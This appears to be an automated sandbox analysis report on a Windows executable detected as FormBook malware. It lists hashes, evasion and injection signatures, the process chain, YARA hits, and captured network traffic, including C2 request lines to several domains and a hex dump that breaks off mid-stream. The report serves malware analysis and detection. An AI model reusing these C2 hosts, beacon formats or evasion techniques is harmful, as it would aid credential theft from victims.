Windows Analysis Report
Pp7OXMFwqhXKx5Y.exe

Overview

General Information

Sample name: Pp7OXMFwqhXKx5Y.exe
Analysis ID: 1567413
MD5: 8a6f66334502bc3da28732ccd4353d14
SHA1: f51ecc0c41835d9aed80c16a8a7121ca08f9476a
SHA256: f6047e5b6850d495f6abb0be606099be170b94fcef640a52681490020a569bf6

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • Pp7OXMFwqhXKx5Y.exe (PID: 5384 cmdline: "C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe" MD5: 8A6F66334502BC3DA28732CCD4353D14)
    • Pp7OXMFwqhXKx5Y.exe (PID: 284 cmdline: "C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe" MD5: 8A6F66334502BC3DA28732CCD4353D14)
      • RAVCpl64.exe (PID: 7488 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • cacls.exe (PID: 4832 cmdline: "C:\Windows\SysWOW64\cacls.exe" MD5: 00BAAE10C69DAD58F169A3ED638D6C59)
          • firefox.exe (PID: 6088 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
Source: 00000002.00000002.179274577947.0000000005D30000.00000040.10000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000004.00000002.182790212280.0000000003470000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000004.00000002.182790291540.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: Process Memory Space: Pp7OXMFwqhXKx5Y.exe PID: 5384, Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Author: Joe Security

Source: 2.2.Pp7OXMFwqhXKx5Y.exe.400000.0.raw.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 2.2.Pp7OXMFwqhXKx5Y.exe.400000.0.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security

No Sigma rule has matched

AV Detection

Source: Pp7OXMFwqhXKx5Y.exe, ReversingLabs: Detection: 44%
Source: Yara match, File source: 2.2.Pp7OXMFwqhXKx5Y.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.Pp7OXMFwqhXKx5Y.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000002.00000002.179274577947.0000000005D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.182790212280.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.182790291540.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Pp7OXMFwqhXKx5Y.exe, Joe Sandbox ML: detected
Source: Pp7OXMFwqhXKx5Y.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Pp7OXMFwqhXKx5Y.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: cacls.pdbGCTL source: Pp7OXMFwqhXKx5Y.exe, 00000002.00000002.179230808356.0000000001008000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cacls.pdb source: Pp7OXMFwqhXKx5Y.exe, 00000002.00000002.179230808356.0000000001008000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: Pp7OXMFwqhXKx5Y.exe, 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179230035520.00000000033BE000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179233863285.0000000003566000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Pp7OXMFwqhXKx5Y.exe, Pp7OXMFwqhXKx5Y.exe, 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179230035520.00000000033BE000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179233863285.0000000003566000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Code function: 4x nop then mov ebx, 00000004h, 3_2_035074BF
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Code function: 4x nop then mov ebx, 00000004h, 3_2_03DB8E4F
Source: C:\Windows\SysWOW64\cacls.exe, Code function: 4x nop then mov ebx, 00000004h, 4_2_035C04BF

Networking

                Source: DNS query: www.juewucangku.xyz
                Source: DNS query: www.foggvdqutxzgea.xyz
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_0350D356 recv,3_2_0350D356
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:53:24 GMTserver: Apacheset-cookie: __tad=1733234004.7002375; expires=Fri, 01-Dec-2034 13:53:24 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:53:27 GMTserver: Apacheset-cookie: __tad=1733234007.2576216; expires=Fri, 01-Dec-2034 13:53:27 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:53:29 GMTserver: Apacheset-cookie: __tad=1733234009.7981421; expires=Fri, 01-Dec-2034 13:53:29 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:56:54 GMTserver: Apacheset-cookie: __tad=1733234214.7907578; expires=Fri, 01-Dec-2034 13:56:54 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:56:57 GMTserver: Apacheset-cookie: __tad=1733234217.8591296; expires=Fri, 01-Dec-2034 13:56:57 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:57:00 GMTserver: Apacheset-cookie: __tad=1733234220.8953293; expires=Fri, 01-Dec-2034 13:57:00 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: close
                Source: global trafficHTTP traffic detected: GET /oz0e/?pluxVm=N0iBPOr2h1wf3hrk0fV7bCYuQaQcnemlKlX+67l0LxDwIz/NET6JyzgCPnJBSBJZztg4pX1Iwr0Nd76JZuhGak0dZt9NjSAeSo6fySf0UlwbimsbHDdeRZs=&Z1EO=OvfHeluUy HTTP/1.1Host: www.88rtp.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /o5mm/?pluxVm=52ZaOoJJHsYFYpcE8OJe6kaaR+Ibp2Nxq28CYNd7tHRxqCukViCUoHxjhmN2/g+W5SkTzZJsaEIA3pVY9O1vDv+SN/8yFpfSlnbOuEouoKz6AG71fS9yZK8=&Z1EO=OvfHeluUy HTTP/1.1Host: www.kubex.devAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /073p/?pluxVm=NsdLHLYUe9sblrm0I+Crv144tHMQQbz/4RSieCn+7DwPKByw7jhxCyJ0LTJMQHRDPlmDRdKjKllFY9ccUXh843okMet3hg+QsBhX3tP/6BR9rZiNBzb3ESI=&Z1EO=OvfHeluUy HTTP/1.1Host: www.sido247.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /dheh/?pluxVm=6JcMAOZ0kkEuPLPobYSFFslgEkquVWiK5Nqk+SkmZf4Wc9f19ayTyDiVFSf9h78jkWY5XnirO34u2f/fghaoX1igb+ZsamnQxKAe0eVMQ+zxkvaWI9vtOSA=&Z1EO=OvfHeluUy HTTP/1.1Host: www.glowups.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /mdkc/?pluxVm=yWWHbhCahbG3DdaBnt9NrGvMUCSQc4g2Tqe6SUjOSsODgr6CFa5SJdyjtzT5mznodS2lvT8/GpN3gvUqymh3/8TyFQ0rIiTFrx443/jhZTAx0fULTMMcMck=&Z1EO=OvfHeluUy HTTP/1.1Host: www.epicurecooks.worldAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /og0p/?pluxVm=aYNz5vX3IaeBLII2gGf9eURLdfN+pzrBFxzqHFB0Zc0E767K5MaAH/EqLovM7A815HxojS38W68HbT3JNl21N4jIU1lh5jKS99Zmbqcxop+R6eeWU//8U3E=&Z1EO=OvfHeluUy HTTP/1.1Host: www.eichner.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /mia8/?pluxVm=lJqwuwutw0TxfZ38sJgHJ7uqXbvMJU6pA/kgjN31XYZ5TRzvlECqmYueWqhH+dns4k5MWxqP8Bok6NcIC1536fve9u1GdSOEvFZBDrTYEySAKG7uhWgC+P8=&Z1EO=OvfHeluUy HTTP/1.1Host: www.juewucangku.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /mg8c/?pluxVm=rjBLh9a8fZJRcQu9K1C3LAtp+/ShEoEfzH3ui2xMInNHtYlxt8Nl0C2ZPsNy1cCyYgBvBEXXCVeazEdoFLasWgZ3AJaOWiiv1TsNcWo9tyTPmHKnoGX/TSk=&Z1EO=OvfHeluUy HTTP/1.1Host: www.nng83.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /vwn2/?Z1EO=OvfHeluUy&pluxVm=8b9RKtQSBHH07PxtYsipjL/lqfXqYX+jQmAZaw9GROHGYV74Mu7xY5rUUGbBS35lPyHtHPQD+8VPnbju2HtxZfcyuqMzjQoAFmm58sa9OXwe8h9QCPhjB/0= HTTP/1.1Host: www.brickhills.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /qrpv/?Z1EO=OvfHeluUy&pluxVm=WiX0LzPqOnM4b37+7/q2MnJgJJwmlCG/8poUwA5NsFkBp/VurdzYoSVVPF8rA/Ka5BkZn+mZS0ORkGe6TXFOOAiLIJoZGeMwExFXk2ddigf2T3UmxoiawIQ= HTTP/1.1Host: www.goldbracelet.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /8h0h/?pluxVm=WsdblX5oKRyaFeduXpZZBYfr3KMp+WtxHr+UJvo5A+6DW3eJEDxswcp5ZYJtgZW5p4zYKJkjyVN2mc228t1VZlr/R5LO29syDvrfnZcSIMlt6XRuzenYE6E=&Z1EO=OvfHeluUy HTTP/1.1Host: www.0be.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /1cwp/?Z1EO=OvfHeluUy&pluxVm=sIFdgnO3FyIHooXZAGWnPd64nEiNYbQbKjddbfNFYhaUQRED9832NCT0LRXwdwmN50zS64Z/ENDcZJBcOGN8yjbqMhS05UVN1tB36ILI/fWY5OM6Vh1joIo= HTTP/1.1Host: www.smartgov.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /vpwx/?pluxVm=QVDEbR6rh5hXI7Ts6cB6silFglbuflfjHrG0P1AfCwx+KCDVCLlnycIybt7pD06IHRHaJm25c0tlog+zyXtoPLPq9cOgZC1PjOnv8m1FSTaOvxyioepA8aM=&Z1EO=OvfHeluUy HTTP/1.1Host: www.hayaniya.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /7znk/?Z1EO=OvfHeluUy&pluxVm=HSNOOCSycaWbpWp1pFuTHgyNeMyGT259cyc1jurPotVrvnXLICbtqfVvbaWKwlIlASBzdIxRFAa/wDiZdCYNsQsDHbsFXQKeKhShRpSMwKmQ7kRuiU3WeuA= HTTP/1.1Host: www.dialogpriest.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: GET /8orf/?pluxVm=yDQ89DLfYgJiEyke7+6q5gE87/fs/XemaXtjJXohmXUOdwNzAwGJy6nqls5iDTVnp9Zi+kacGLaYAX6Ad+cHYYESeoueNmRKrwXa18136rVeVa07ORWAOLw=&Z1EO=OvfHeluUy HTTP/1.1Host: www.224466.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: cacls.exe, 00000004.00000002.182792565138.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory:
                Source: unknown HTTP traffic detected: POST /o5mm/ HTTP/1.1
                Host: www.kubex.dev
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                Accept-Encoding: gzip, deflate
                Accept-Language: en-US,en;q=0.5
                Origin: http://www.kubex.dev
                Referer: http://www.kubex.dev/o5mm/
                Content-Length: 203
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 03 Dec 2024 13:51:29 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 
72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 03 Dec 2024 13:51:45 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 03 Dec 2024 13:51:47 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 03 Dec 2024 13:51:50 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 